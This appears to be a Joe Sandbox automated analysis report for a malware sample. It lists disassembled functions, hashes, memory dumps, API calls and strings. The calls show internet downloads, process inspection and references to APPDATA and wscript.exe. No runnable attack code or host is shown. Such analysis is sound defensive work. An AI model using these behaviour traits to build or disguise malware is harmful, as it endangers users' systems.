                                                                                                                                                                                            • Opcode ID: 220112d8f39cdcc593a3a003b295f9a5a1c6afae9280af9300a0642ecbc41cbf
                                                                                                                                                                                            • Instruction ID: c3f6ddfceb35a157f84ca65cdc2d16e90ec7c26a0b4f422fd52874a502a2e140
                                                                                                                                                                                            • Opcode Fuzzy Hash: 220112d8f39cdcc593a3a003b295f9a5a1c6afae9280af9300a0642ecbc41cbf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0051567060C74DB6DF398A28849DBBE6F8ABB4E304F140D2DDF82D72C2C65D9D05A612
                                                                                                                                                                                            Function 00608004 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                            • Opcode ID: c482eb394991919e1588572c93b5284be942507ac358c740fa0dd89d11f06c1e
                                                                                                                                                                                            • Instruction ID: c8ede12a0c502b720c9109901fcfa8b3407c7adb7663f08f3860f4efe44362f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: c482eb394991919e1588572c93b5284be942507ac358c740fa0dd89d11f06c1e
                                                                                                                                                                                            • Instruction Fuzzy Hash: F9A01230102201CBA3004F355B0520B379665011803009054A005C4120D62040504600
                                                                                                                                                                                            Function 00602D19 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b3cd5b4615a7c6fa023b93071facb7b304bbf024b652dfea36bf7b81411f15f9
                                                                                                                                                                                            • Instruction ID: 01198a8810efc8a41a93ab82699d197e262f05b9b96683730b3518da31d67871
                                                                                                                                                                                            • Opcode Fuzzy Hash: b3cd5b4615a7c6fa023b93071facb7b304bbf024b652dfea36bf7b81411f15f9
                                                                                                                                                                                            • Instruction Fuzzy Hash: A7327661D68F010DD7278634D822376A68EAFB73C5F18D327E81AB6EA5EF29C5C34100
                                                                                                                                                                                            Function 005E5780 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f109be69dd04bd94a2a64cc93818bde7b7f94eb6067f1bf167ae3f90fd184b67
                                                                                                                                                                                            • Instruction ID: 52c7010095aa050fafa26e2120fbb20362fb0334f2e5686f61ec81f8dc2698d3
                                                                                                                                                                                            • Opcode Fuzzy Hash: f109be69dd04bd94a2a64cc93818bde7b7f94eb6067f1bf167ae3f90fd184b67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65510775B1455A9BDB0CCE6ED8405BC7BA7ABC4310B55C229E895CB285FB30D921DBC0
                                                                                                                                                                                            Function 0060B5D1 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a76c8b41ee9bc75d2759714812071b511e1e8fc557aef4e2560311458bc3420f
                                                                                                                                                                                            • Instruction ID: cea3d7ca0a27465b581415098c8b0f05140639a2d976037da1e8c6659c847040
                                                                                                                                                                                            • Opcode Fuzzy Hash: a76c8b41ee9bc75d2759714812071b511e1e8fc557aef4e2560311458bc3420f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D21B673F20539477B0CC47ECC5327DB6E1C68C601745823AE8A6EA2C1D968D917E2E4
                                                                                                                                                                                            Function 0060B4B1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 279f5634a47c25c446bf8056943306eb25e27aa06c712e42c86ec33765daf780
                                                                                                                                                                                            • Instruction ID: fd2b10ca01a8c6f1f6a1dc134a3de16706917c443102fa76880b8a0500b7a6ae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 279f5634a47c25c446bf8056943306eb25e27aa06c712e42c86ec33765daf780
                                                                                                                                                                                            • Instruction Fuzzy Hash: D511A323F30C256A675C81A98C132BAA1D3EBD824070F533AD826E72C4E9A4DE13D290
                                                                                                                                                                                            Function 005F19A0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction ID: afcdb447e23ab60f4f5b65069efe25a1be1483ee65b7e60996e630c246f1357e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85115E7724188AC3D6148A7EC6B46B6AF95FBC5320B2C437AC2C24BB58D16B99419688
                                                                                                                                                                                            Function 005FFF39 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c01e9777f494ea02394e51ea28b205c4ca470a38e1002bee0bddf62d3a72e8f1
                                                                                                                                                                                            • Instruction ID: 668e6e0178796af59a4bb9bbb70bdfe87b77f33a3306cbccdc41392e61a34d49
                                                                                                                                                                                            • Opcode Fuzzy Hash: c01e9777f494ea02394e51ea28b205c4ca470a38e1002bee0bddf62d3a72e8f1
                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF03032A15228ABDB26CB48D409BA9B7B9EB47BA1F114066F601EB690D674DD00C7D0
                                                                                                                                                                                            Function 005FFF7D Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
                                                                                                                                                                                            • Instruction ID: 5f45a05ba523eaa93a126c5800573258df0774d81e6a66eb511be302982e805b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 11E08C3291122CEBCB24DB98C908D9AF7FCFB85B00B1140A6B601D3510C274DE00C7E0
                                                                                                                                                                                            Function 005F84EA Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                            • String ID: 0!a
                                                                                                                                                                                            • API String ID: 2509303402-1828747439
                                                                                                                                                                                            • Opcode ID: dd06fa724dda342ee85b0e1e271e8fb6269e25815537ed38e18aa8372ea195ee
                                                                                                                                                                                            • Instruction ID: 49e37efb9ed510ce3aee627b52112d717045d3e947927a0d31b81c56418389ee
                                                                                                                                                                                            • Opcode Fuzzy Hash: dd06fa724dda342ee85b0e1e271e8fb6269e25815537ed38e18aa8372ea195ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED1AC71D0030A9FDB11DFA8C885BFEBFB5BF49300F144529E695AB282DB79A845CB50
                                                                                                                                                                                            Function 005D29C0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 311networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D2BA1
                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 005D2C1D
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D2C2A
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D2C98
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D2C9B
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CC7
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CFE
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D2D52
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D2D55
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                            • String ID: ""~|fP$,`$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
                                                                                                                                                                                            • API String ID: 3539267403-3594769453
                                                                                                                                                                                            • Opcode ID: e2bf7b570ddc9e190470bc3d3569ad3c1d56c9736f6bb3db25050d12cfc15689
                                                                                                                                                                                            • Instruction ID: 766394d180cfdcb8adf6d5b0175fe8a1ed16be23ff6bca1e5957dab0a8db06b6
                                                                                                                                                                                            • Opcode Fuzzy Hash: e2bf7b570ddc9e190470bc3d3569ad3c1d56c9736f6bb3db25050d12cfc15689
                                                                                                                                                                                            • Instruction Fuzzy Hash: 20B11631D102189BDB12DB78DC45BEAB7B9BF69340F10876BF904B6251FB71AAC18B40
                                                                                                                                                                                            Function 005DBFD0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DBFE5
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DC000
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC020
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC071
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005DC167
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC17F
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC18D
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC192
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DC197
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: N#^$N#^$d`$false$true
                                                                                                                                                                                            • API String ID: 1941589060-2412832227
                                                                                                                                                                                            • Opcode ID: f39d072459c109fd48bd7fd7d6a021e4a74d0c0f213105ecb24b640043a7f64f
                                                                                                                                                                                            • Instruction ID: c7e8452a5c742d1f25f95bdbf54aca56fd825fdf109205728e439b2f93e6bd2f
                                                                                                                                                                                            • Opcode Fuzzy Hash: f39d072459c109fd48bd7fd7d6a021e4a74d0c0f213105ecb24b640043a7f64f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8251C330A01316DBDB38DFA9D845A9ABFA1BF54310F14456FE8499B352DB32ED02CB81
                                                                                                                                                                                            Function 005D13C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 332COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 005D13DD
                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 005D13FB
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 005D1405
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 005D144A
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 005D1455
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 005D175F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$Process$CurrentFileModuleNameOpen
                                                                                                                                                                                            • String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
                                                                                                                                                                                            • API String ID: 1772831937-2916873119
                                                                                                                                                                                            • Opcode ID: aaf6ec065320693acf5d4d68661c6f775d8631a681c40bdc7b6ac7002b8f50c8
                                                                                                                                                                                            • Instruction ID: 8b065620b875830a42b8f2a934c3c538d17cc22a4cfa7b539332e788910df140
                                                                                                                                                                                            • Opcode Fuzzy Hash: aaf6ec065320693acf5d4d68661c6f775d8631a681c40bdc7b6ac7002b8f50c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91B13432E00604ABDB20DAACDC84BBEBB79FB80350F58416BE816A7392D735DD45C758
                                                                                                                                                                                            Function 00606A28 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00606A6C
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605CF1
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D03
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D15
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D27
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D39
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D4B
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D5D
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D6F
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D81
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605D93
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DA5
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DB7
                                                                                                                                                                                              • Part of subcall function 00605CD4: _free.LIBCMT ref: 00605DC9
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A61
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A83
                                                                                                                                                                                            • _free.LIBCMT ref: 00606A98
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AA3
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AC5
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AD8
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AE6
                                                                                                                                                                                            • _free.LIBCMT ref: 00606AF1
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B29
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B30
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B4D
                                                                                                                                                                                            • _free.LIBCMT ref: 00606B65
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                            • Opcode ID: 5684e3363b821f4c2387fff85a1d201a080251b22b62368c6555c73e391b364e
                                                                                                                                                                                            • Instruction ID: 5554644f40472c17cd5b37d45bae2f4d9e91133e88e1613e6bef4b82b64f886d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5684e3363b821f4c2387fff85a1d201a080251b22b62368c6555c73e391b364e
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA318F716803099FEB25AB38EA49BA77BEAFF40350F148429F254D7291DB75BC60C720
                                                                                                                                                                                            Function 00605DD2 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: 0ff42c91669c732288d2766aafec07dad9ab6c7fcd8cbf8cf330ceb0118a4b39
                                                                                                                                                                                            • Instruction ID: 927f8a268ac0f40c8252696df65722edf57b47f3c71f35f1a0e723ae0a80cbaa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ff42c91669c732288d2766aafec07dad9ab6c7fcd8cbf8cf330ceb0118a4b39
                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C16672E80209ABDB64DB98CD46FEF7BF9AF08700F144164FA05EB2C2D6709A418B54
                                                                                                                                                                                            Function 005F3CC8 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
